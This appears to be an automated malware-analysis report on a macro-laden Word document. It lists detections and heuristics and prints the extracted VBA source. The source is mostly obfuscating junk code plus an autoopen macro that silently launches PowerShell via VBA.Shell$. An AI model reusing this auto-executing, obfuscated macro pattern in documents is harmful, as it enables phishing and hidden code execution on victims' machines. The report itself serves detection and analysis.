Verdict: MALICIOUS
Risk Score: 310

Malware Insights

MITRE ATT&CK:
- T1059.001 PowerShell
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains VBA macros with critical firings for Shell() calls and PowerShell references. The 'autoopen' macro suggests it executes automatically upon opening. The ClamAV detection name 'Doc.Macro.DollarShell-6346616-0' further indicates a macro-based threat that likely uses shell commands. The primary function appears to be executing PowerShell, suggesting it acts as a downloader for further malicious activity.
Heuristics (9)

- ClamAV: Doc.Macro.DollarShell-6346616-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `On Error Resume Next VBA.Shell$ "" + "powershell [System.Net.DNS]::GetHostByName('').HostName", 0 End Function`
- PowerShell reference in VBA (critical, OLE_VBA_PS): PowerShell reference in VBA. Matched line in script: `On Error Resume Next VBA.Shell$ "" + "powershell [System.Net.DNS]::GetHostByName('').HostName", 0 End Function`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub autoopen() MfKEFtN`
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7935 bytes |

SHA-256: 06b0086f2a0b6650692f73efddfbaddf06183d69cf30ed48eb7fa455235165ea
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub MRfF227()
On Error Resume Next
Do
Select Case pKQixBx
Case 18793868
HrCrIlf = CBool(65 - CSng(vuAl - Round(558) - beAC / CLng(11 * Rnd(171417130))))
yJEO967Y6 = 9203
Case 5
bHmbEY = Int(532772391)
kIUWfo8K = Int(tYFk813D3)
End Select
Dim seH()
ReDim seH(2)
seH(0) = 264849359
seH(1) = 33098296
Select Case CZk
Case 346281819
ZIj = Hex(43848039 - ChrW(dbS) / 7 * ZveT8T2H9)
CreK9UY6 = Sqr(kORo485V8 + CByte(365104055 + Round(9041 / Log(8) / TKl - ChrW(51))) / KBoC6f220 + JSvX78At)
kHgLw2 = Int(9434)
Case 6
kLF = Fix(vaKp7)
LwzTji = CBool(eiug7)
zvbH5M = jUNFrPs
Case 2986
YMRS = 29
eXG = Round(232952633)
OgyR13aJ = Hex(1)
End Select
Set aGj = MeMG01
Loop Until TMGC15d <> ptHmBrqQE
Do
oMQY = Sin(406004041 - Chr(fbIQV / CByte(7 / hyGB) - 3 * Round(5 * BteDKgp)) - nRQrs3S + CDate(467260834 + ChrB(bUHdH)))
qPxG = fbeZx1C + 536281499
hNlToXE0 = (3276 / CStr(enjV87yY - Rnd(9)) * 52 / CInt(985 + Hex(1 * 21) / 5 * CInt(hDQS - CByte(598))) * Iblb0 - Chr(CcX))
Do
BSCB5965 = CDbl(96)
Loop Until KAjc8 <= DOc
KIlFg1 = (yuTRu0wQ6 / PlGJ5x6T - (560 - ChrB(teIy) - NRSdnP + CByte(4680) / (Rqm * Tan(90) * (9669 + CLng(JDmPeCwhZ - Int(jWvF2)) - RNgDS4h5y * 3))))
Loop Until yQIY8htto Or 5
rjoG1P = MmD - oHh
End Sub
Sub VXnWm(JRmm4h)
On Error Resume Next
If hfuM8 Or tHTPP Then
Do
vswXP9rWb = gbej4mY7n + Int(8105) / jkLO * Hex(KKG / Atn(9)) / RhT - Fix(670)
Loop Until lmHoU0o Or RVqCq4Do7
If nLFz Eqv hkUu201R Then
LTl = CBool(250089612)
End If
ElseIf YQPf Xor EbhQ62 Then
Do While GrhR And qjnU6q
ygJXK = 512374437
Loop
Vyo = (IaG + CDate(8 / RwVB26 - jttkjmQ / Sqr(onOb9Gx)) + KBvgz - ChrB(71) - cgtv45 + 96 + JYmphtI69 / sIm + 5 - Oct(bJhbnw0c / CStr(TWTb7B) * 70 - CDate(IlBx)) * 30 * Oct(eOjzJ54ai))
End If
Select Case XZZT9z
Case 918
KfOAFH6Iu = CDbl(284685011)
GBALw9E10 = CLng(305749864)
zhqEWH = Hex(3424 - ajwHo0T1)
Case 9
taOh = ZBluh
bXIl9a = QrMCX589Y
xPCU66c = CByte(6408)
End Select
End Sub
Sub autoopen()
MfKEFtN
End Sub
Sub fduN(OJff)
On Error Resume Next
Do While FLYI7G263 >= 18
qBvlX = MdKK - 21976223
Iavn3u07a = KbVR49F * 189328296
Loop
While oXQibRnr Xor kBlOH01b
Do While EMju8w <> EfNF7
KUa = Atn(80 / Tan(23 - DqU) - CrEK4 - 8951)
Loop
VxlOb167 = tvst2V94 / CLng(4 * ChrB(adNb)) + 448636581 - Tan(94 + Cos(245842808)) / 356 - Round(xSz) / yWxu52I + CDbl(GBFV4aDL) - 1229 * Sin(425 + Log(304096732)) / (JxnL2 / CDbl(1 + Round(3) / hxTR * Tan(61 + CLng(IvOq016W0 + Atn(cAZ)) * 242025946 - Atn(JCdi337))))
hFNAAo9 = ChrW(cyp + CStr(AwfpV) - kTkBp86 / 6)
Do
VGBC = KxJJnEgZ4 - Rnd(sozb - Oct(HZMd5m2e * CLng(432728309 * CLng(VoNx16))) - Wszwp * 658) * 870 / 193690625 * fXAip91 + Fix(fltHA11H + 701)
Loop Until ePZsCbwig <> 19
While Fsp Or 732
VXQK0 = 92 + Cos(yoEnGnPp / Round(bSr / CStr(VIoP3r2) / 97582935 * LGNO9H) + 533087076 - Chr(ysid7)) * (1 / 890 / 15323515 * CByte(OXqd5) * 186 + 608 + IquI637K / 13 / (9 + mfmt8e7))
Wend
While tjoo6 >= feJk024u
QRuNK9z = (3033 - CDate(322) / 149 / DAOqsNP99) + (UzzoAV8 / Atn(63) - (bGWa2s4T - CDate(5)))
Wend
Wend
ySA = CBool(8)
End Sub
Sub OJcf71T61()
On Error Resume Next
Do While QZciS And 7
For Each skqku3N In UQN
udcBgS = mHuP9FPN8 - CLng(iCip) / QCBd + CDbl(71816958) + 8470 + CLng(UmmI1 - vfjNiv3) - jyJi4 + Log(HeqUMrT4W) + IjsS + Atn(dxRX0g15)
Next
rPXf1I4 = CrlE
BHlI544g8 = RSeD
mgokdB2 = 486058022 * 295585723
Loop
If owYKsh4eZ < UwvHyr Then
While jxYMb70L And XhNmm14x
ltQp = OhcL7Y1D4 - Sin(NKYaXhjJ * Rnd(4) / eoDSNj09 - Hex(fnVH)) + (152736399 + CDbl(8601))
Wend
CPdr5V8M = cBUx0BBw4 + GAYw02J
ElseIf EUha Xor NhTm3C Then
Set rJIa = AnmH3J646
For Each vmjYlP0 In PMSU1
tJiXR = (68 - ChrB(514168117 + Sgn(609 + Int(538 * ChrW(368339161 * CStr(LUzBF2I1B))) * 639 * 528157508) - mUCMF63Y * Round(688)) + (6 - CBool(7260 / Int(378) + dzbB4M / slXZ1) - rxdi - Round(5) / (zmXu + 65)))
Next
End If
End Sub
Public Function MfKEFtN()
On Error Resume Next
VBA.Shell$ "" + "powershell [System.Net.DNS]::GetHostByName('').HostName", 0
End Function
Sub YqkwQw2()
On Error Resume Next
Do
Do
zvBF82iy = DZHBB - 70 * YEAv + Sgn(WBGU2E11)
Loop Until uhFb < uNtR965
While nJtGlp3 >= jTklnfsL
LNaVi2 = 521 / sfWck / pceZh415 / ChrW(595 / CInt(2)) - 5 * Round(XZBQf7) - 6800 - CLng(gOjj9b062 + BmKi303D) * 60 / Int(MNQM7744) + (8059 / Tan(XzUIzK6x) / YihiPs6 * CDbl(20776914 * CDate(514113094) + 1 / Round(270060603)))
Wend
veIfF = 815 * Round(iCZNo) + QXTX / 112188161 / (THVDarIU * Sin(GZT))
For Each POPxv4S2 In wOGJ7lj
AHGz = PlXC * Round(455799610) - 2905 / gSDy + (bsxt178U / Round(zQad - mXBXV8) / 89442276 - 657 / (204367578 / CInt(viTv5 * 304) - ViVY4P50 - Fix(313922968)))
Next
rwbd = 240248942 / jcHn5
Loop Until iEmV69 <> iFUQg78
DlNc5422 = (27 - ydEY - RMq / CBool(CMKu4) - (aeKY28n9 / CByte(rRI) + (RcqRp - CBool(LfRI08C8z - ChrB(223481334) * JHK / Sgn(25 - CLng(69))) + (vtuB2oY + ChrW(2935 + CInt(9) + UzjQ * CInt(181911309)) * 665 / Rnd(7)))))
While KWhY1 >= 21
For pCIET = ElOk0BC64 To xEjX07Q
wAGR9 = Cpvr042V / Cos(MqvS7A29 / fpQqDXHF3 - 81 / Atn(1)) / lgbyr3U - Rnd(7) * WFpZx5 * Log(1596 * fqRB)
Next
If PupH01uC <= 14 Then
IGgxO = 807
End If
For BIT = 2418 To 7677
dlkJc7 = zgn * Hex(7745) - 301618901 + Hex(vOfoT5uu) / oOHQ * Oct(89 - Atn(RVuOj1 - Fix(72))) - 68 / Log(SfZnP6) * (kQlG / CStr(4375) / (FUa / CDbl(iwVC) + EebH1l1l2 / Chr(2)))
Next
Wend
End Sub
Sub hwrOJ4(Byv)
On Error Resume Next
If EfvU0ypm >= ceWj6u7 Then
If vtmo > 17 Then
ayk = CSng(kru)
End If
Select Case wjcxxjA
Case 6919
MlVN72x = 326
Ekix12Yh1 = CSng(8)
WbR = Sqr(dufvSoDR)
Case 3
UgBS37 = eaji
xHJiODDFe = CLng(WKK)
hfLIkqA = CByte(15)
End Select
End If
If XLzX0B8 = UvrR60 Then
Select Case ijHdO
Case 867
OhhU9nF = KWbSS1
iaAoX6 = CStr(4)
EtW = Fix(5101 / Round(wnjuo6))
Case 153
eUkB = 1665
VuMG847 = Cos(438249070 + 6)
yWwz5 = Hex(MDiS5K)
Case 40
yOAWD5pS = HCzzWSso
Wio = Sqr(330)
uwC = 3
End Select
While pPt < 6186
XMuq0 = DQz / Round(PzZb6) - PkLI468jd + PjMK5 / 154 / Hex(ucUOAwz0w) - nWW / Fix(TMuj3) / OrpX2 * Sgn(moU) * (ABxD - Atn(4899) - 136094830 * Log(cFLK86e01))
Wend
ElseIf IAV <= 66679749 Then
For Each Qrcxt9Li3 In POgy2N7G
lBeh = 9006 - Fix(brMn9v800) + 45 + Log(QkVr) * sNET41v + CBool(pFfH)
Next
While mPBXlK465 Xor 26
uCDq = jOYl / sUBFo05 - hNZ + Chr(93) - 420140798 - CLng(fVWISB)
Wend
End If
End Sub